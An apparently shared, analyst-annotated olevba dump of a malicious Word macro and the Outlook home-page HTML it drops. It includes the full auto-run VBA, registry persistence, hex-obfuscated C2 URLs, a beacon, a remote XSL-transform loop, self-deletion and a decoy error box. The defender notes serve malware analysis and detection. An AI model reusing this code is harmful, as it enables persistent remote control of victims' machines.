Created
October 1, 2020 01:41
A very interesting DOCX, no?
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
' Win32 import: kernel32!ExpandEnvironmentStringsA, exposed to the macro under the name ExpandString.
' Document_Open calls it twice to expand the string it reads from the "FL" document property.
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long | |
' Word auto-run entry point: Document_Open in ThisDocument fires when the document is opened with macros enabled.
' Visible steps: (1) open/create the per-user Outlook WebView\Inbox registry key, (2) set its URL value to a local
' file path, (3) write a file decoded from a document property to that path, (4) send one HTTP GET, (5) show a
' decoy error box and unhide the "Page1" bookmark.
' Defender note: Word writing under ...\Outlook\WebView\ and Word instantiating Microsoft.Windows.ActCtx are both
' unusual for a document and are practical detection points for this sample.
Sub Document_Open() | |
' Every failing statement below is skipped silently, so a partially blocked run shows no error to the user.
On Error Resume Next | |
' Activation-context object; the inline manifest assigned below declares a clrClass, presumably so the .NET class
' can be created by progid without being registered as a COM server.
Set ax = CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
' c is only used for its Registry member; the macro never calls a registry API directly.
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
' Key under the current user's hive, versioned with Word's Application.Version.
' NOTE(review): the first literal carries doubled backslashes and VBA has no backslash escape, so they are passed
' as written; confirm how the registry API normalizes them when reproducing the key path for hunting.
Set k = c.Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Office\\" + Application.Version + "\Outlook\WebView\Inbox") | |
Dim i As String, o As String, rs As Long | |
' Path template comes from the document property "FL" (value not shown in this dump).
i = R("FL") | |
' rs is still 0 and o is empty here, so this first call only obtains the required buffer size.
rs = ExpandString(i, o, rs) | |
o = Space$(rs) | |
' Second call fills the buffer with the expanded path.
rs = ExpandString(i, o, rs) | |
' Points the Inbox WebView (folder home page) URL at the local file; note this is written before the file exists.
k.SetValue "URL", "file:///" & o | |
' Decode the hex held in the "Hyperlink Base" property and write it to the expanded path (the HTML shown later in this dump).
WB o, DH(R("Hyperlink Base")) | |
' Synchronous GET to the URL stored in property "U"; the response is never read in the visible code.
' NOTE(review): looks like an open notification / check-in; the "U" value is not shown here, confirm from the sample.
Set oh = CreateObject("MSXML2.XMLHTTP") | |
oh.Open "GET", R("U"), False | |
oh.Send | |
' Decoy: a fake security-product error dialog shown after the steps above have already run.
Dim Msg, Style, Title, Help, Ctxt, Response, MyString | |
Msg = "Error: FireEye DLP parsing failed." | |
Style = vbOKOnly | |
Title = "FireEye DLP" | |
Help = "DEMO.HLP" | |
Ctxt = 1000 | |
Response = MsgBox(Msg, Style, Title, Help, Ctxt) | |
' Reveals the text under bookmark "Page1", which Document_Close hides again.
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = False | |
End Sub | |
' Runs when the document is closed: re-hides the "Page1" bookmark text and saves without prompting,
' so the file on disk returns to the state it had before Document_Open revealed the text.
Private Sub Document_Close() | |
' Failures (for example a missing bookmark or a read-only file) are ignored.
On Error Resume Next | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = True | |
' Applies to all open documents, not only this one, and suppresses the save prompt.
Documents.Save NoPrompt:=True | |
End Sub | |
' Writes a byte array to disk through ADODB.Stream.
'   file  - destination path
'   bytes - binary content to write
' Defender note: an Office process creating ADODB.Stream and calling SaveToFile is a common file-drop pattern.
Private Sub WB(file, bytes) | |
' Any failure (bad path, access denied) is ignored and the caller is not told.
On Error Resume Next | |
Set s = CreateObject("ADODB.Stream") | |
' 1 = adTypeBinary
s.Type = 1 | |
s.Open | |
s.Write bytes | |
' 2 = adSaveCreateOverWrite: an existing file at the path is replaced.
s.SaveToFile file, 2 | |
End Sub | |
' Hex decoder: converts a hex string to binary by letting an XML DOM element parse it as "bin.hex".
'   hex - hex-encoded text
' Returns the element's typed value (the decoded bytes); with errors suppressed, a bad input yields an empty result.
Private Function DH(hex) | |
On Error Resume Next | |
' A throwaway element is used only for its dataType conversion; nothing is added to a document.
Set EL = CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = hex | |
DH = EL.nodeTypedValue | |
End Function | |
' Reads a document property by name: built-in properties first, custom properties as fallback.
'   sPropName - property name (the macro uses "FL", "Hyperlink Base" and "U")
' Returns the property value as a string, or "" when neither collection has it.
' Defender note: the configuration lives in document properties (docProps/*.xml), not in the macro source,
' so string scans of the VBA alone will miss it.
Function R(sPropName As String) As Variant | |
' Immediately superseded by the On Error GoTo two lines below.
On Error Resume Next | |
Dim bCustom As Boolean | |
Dim sValue As String | |
On Error GoTo ErrHandlerRead | |
' First attempt: built-in property; a missing name raises and jumps to ErrHandlerRead.
sValue = ActiveDocument.BuiltInDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
' Reached only through Resume in the error handler; marks that the fallback is in progress.
ContinueCustom: | |
bCustom = True | |
' No visible statement jumps to this label; execution falls through from ContinueCustom.
Custom: | |
sValue = ActiveDocument.CustomDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ErrHandlerRead: | |
Err.Clear | |
' First failure: retry against custom properties. Second failure: give up and return an empty string.
If Not bCustom Then | |
Resume ContinueCustom | |
Else | |
R = "" | |
Exit Function | |
End If | |
End Function | |
############################################################################ | |
## in docProps/app.xml [tag={...}HyperlinkBase, text below: | |
##  | |
################################################################################ | |
<html> | |
<head> | |
<title>Inbox</title> | |
<script id="EventHandlers" language="vbscript"> | |
' Script-level state shared by T and Window_OnLoad.
' tm = pending timer handle; idx = index of the next dm entry to try (never assigned before its first use).
Dim tm, idx, dm, ft, tk, et | |
' Cut-off compared in Window_OnLoad against seconds elapsed since 01/01/1970; read as a Unix timestamp it falls on 2020-09-30.
et = 1601428135 | |
' Sent as the "token" query parameter on every request made by T.
tk = "98ITEUFD" | |
' Delay in milliseconds before T tries the next URL (300000 ms = 5 minutes).
ft = 300000 | |
' Candidate URLs, each stored as hex and chopped into short "&"-joined fragments; DH turns an entry back into text.
' The first entry is the hex of UTF-16LE "https://usda-portal.esri.com/index.php", matching the list at the end of this dump.
' Defender note: the fragment splitting defeats plain string matching on the hex, so match on the decoded values instead.
dm = Array("6800"&"740"&"074007000"&"73003"&"a"&"0"&"02"&"f0"&"02f"&"007"&"50073"&"00640"&"06"&"1"&"0"&"02d0"&"070006f0072007"&"40"&"0"&"610"&"06"&"c002e00"&"65007"&"3"&"00"&"72"&"0069002e0063"&"006f006"&"d002"&"f0"&"06"&"900"&"6e0"&"06"&"40"&"0650"&"07"&"8"&"0"&"02e"&"0070006800700"&"0","6"&"800"&"74007"&"4"&"0"&"07"&"00073003a0"&"02f00"&"2f006c0"&"0690"&"0620"&"0"&"720"&"0"&"61"&"0072007900"&"2e006f0"&"07200"&"6"&"5006"&"9006"&"c006c00"&"79002e00"&"63006"&"f006"&"d0"&"02f006"&"9006"&"e0064"&"00"&"65007"&"80"&"02"&"e007"&"0"&"0"&"068007000"&"","680"&"074007"&"4007000"&"73"&"003a002"&"f002f"&"006d"&"00790"&"0"&"6800720"&"0"&"7"&"0006"&"c"&"006"&"10"&"0"&"6e"&"0"&"02e0063006f0"&"0"&"6d"&"002f0"&"069006e0"&"06400650078"&"0"&"02"&"e"&"007"&"0"&"006"&"80"&"07000","6800"&"740"&"0740070007"&"300"&"3a002f002"&"f00"&"7"&"0006f0"&"0"&"63"&"0"&"0"&"2"&"e006600740070002d0"&"06"&"e"&"006"&"1003200"&"2e00620061"&"007"&"9006500"&"72002"&"e"&"006300"&"6f006d002"&"f00690"&"06"&"e0"&"0"&"64006500"&"780"&"02e0"&"0700068"&"00"&"7000","68007"&"4"&"007400"&"70007"&"3003"&"a002f002f00"&"7"&"30"&"065"&"0"&"0720076006"&"90"&"06"&"3006"&"5"&"007"&"3002e006c00"&"79"&"00720"&"06"&"90"&"0"&"7"&"3002e00"&"630"&"0"&"6f0"&"06d002f0"&"06"&"90"&"06e0064006"&"50"&"07800"&"2e0070"&"00"&"6"&"8007000","680074007"&"400"&"7"&"000730"&"03a"&"0"&"02f002f007"&"a003"&"2"&"0"&"0"&"2e"&"00"&"6"&"3007"&"30"&"02e"&"006e"&"007600"&"69006"&"4"&"0069"&"0061"&"006"&"70072"&"0"&"069"&"0064002e00"&"6e00"&"6"&"500"&"74"&"002f0069006e006"&"40"&"06500"&"7800"&"2e0070006800700"&"0","6800740"&"07400"&"7"&"000"&"73"&"00"&"3a0"&"0"&"2f002f0064006"&"5007600770"&"06"&"50"&"06"&"200"&"2e"&"0"&"0610073"&"0"&"063"&"0"&"0"&"63"&"002"&"e00"&"6d"&"0"&"065"&"0"&"02f00"&"690"&"06e"&"00640"&"0650078002"&"e007000680"&"0"&"70"&"00") | |
' Hex decoder for the dm entries: parses h as "bin.hex" through an XML DOM element and returns the result as a string.
'   h - hex-encoded text
' The DOM object is created through the Outlook application object exposed by the embedded control (ViewCtl1),
' not through a plain CreateObject call in the page's own script context.
Function DH(h) | |
On Error Resume Next | |
Set EL = ViewCtl1.OutlookApplication.CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = h | |
' CStr turns the decoded byte array into text; the hex is 2 bytes per character (UTF-16LE), as the first dm entry shows.
DH = CStr(EL.nodeTypedValue) | |
End Function | |
' Timer callback: requests the current dm URL, processes the reply as XML, and moves on to the next URL on failure.
' Reads the script-level tm, idx, dm, tk and ft; updates idx and tm.
' Defender note: these requests originate from the Outlook process, and each carries "?token=" & tk & "&x" in the query string.
Sub T() | |
On Error Resume Next | |
window.clearTimeout(tm) | |
Set d = ViewCtl1.OutlookApplication.CreateObject("MSXML2.DOMDocument") | |
Set ho = ViewCtl1.OutlookApplication.CreateObject("MSXML2.XMLHTTP") | |
' Synchronous GET to the decoded URL; idx is used as declared (unassigned on the first call, i.e. the first entry).
ho.Open "GET", (DH(dm(idx)) & "?token=" & tk & "&x"), False | |
ho.Send | |
d.LoadXML ho.responseText | |
' The fetched document is applied to itself as a stylesheet.
' NOTE(review): the reply is fully server-controlled and is processed as a transform rather than stored, so treat it
' as remote content delivery into Outlook; confirm what is returned from captured traffic.
d.transformNode d | |
' A reply that parsed cleanly ends the loop; no further URLs are tried and no timer is re-armed.
If d.parseError.errorCode = 0 Then | |
Exit Sub | |
End If | |
' Otherwise advance to the next URL and retry after ft milliseconds; stops once the last entry has been tried.
If idx < UBound(dm) Then | |
idx = idx + 1 | |
tm = window.setTimeout("T", ft, "VBScript") | |
End If | |
End Sub | |
' Page-load handler. Past the cut-off time et it removes the registry URL value and the dropped file and stops;
' before the cut-off it schedules the first call to T after 5 seconds.
' Defender note: the self-cleanup means the WebView URL value and the file may already be gone on a host examined
' after the cut-off, so absence of either artifact does not rule out an earlier run.
Sub Window_OnLoad() | |
On Error Resume Next | |
' Seconds between 01/01/1970 and the local clock (Now), compared against et.
If (DateDiff("s", "01/01/1970 00:00:00", Now) > et) Then | |
' Same activation-context and manifest sequence as the Word macro, here created through the Outlook application object.
Set ax = ViewCtl1.OutlookApplication.CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
' Key path is rebuilt from the first four characters of Outlook's version string; the Word macro used Word's
' Application.Version instead. NOTE(review): the two only address the same key if those values agree.
Set k = c.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Office\" + Mid(ViewCtl1.OutlookApplication.Version,1,4) + "\Outlook\WebView\Inbox") | |
Dim v: v = k.GetValue("URL") | |
k.DeleteValue "URL" | |
' Mid(v, 9) drops the 8-character "file:///" prefix to recover the local path of the dropped file.
ViewCtl1.OutlookApplication.CreateObject("Scripting.FileSystemObject").DeleteFile(Mid(v, 9)) | |
Exit Sub | |
End If | |
' Not yet past the cut-off: start the request loop 5000 ms after load.
tm = window.setTimeout("T", 5000, "VBScript") | |
End Sub | |
</script> | |
</head> | |
<body> | |
<!-- Embedded Outlook View Control (id ViewCtl1) bound to the MAPI namespace. The script in <head> uses
     ViewCtl1.OutlookApplication as its way to create every COM object it needs, and the control fills the page. -->
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"> | |
<param name="Namespace" value="MAPI"> | |
</object> | |
</body> | |
</html> | |
############################################################################### | |
Decoded values of the dm array above (hex, UTF-16LE), one URL per entry:
https://usda-portal.esri.com/index.php | |
https://library.oreilly.com/index.php | |
https://myhrplan.com/index.php | |
https://poc.ftp-na2.bayer.com/index.php | |
https://services.lyris.com/index.php | |
https://z2.cs.nvidiagrid.net/index.php | |
https://devweb.ascc.me/index.php |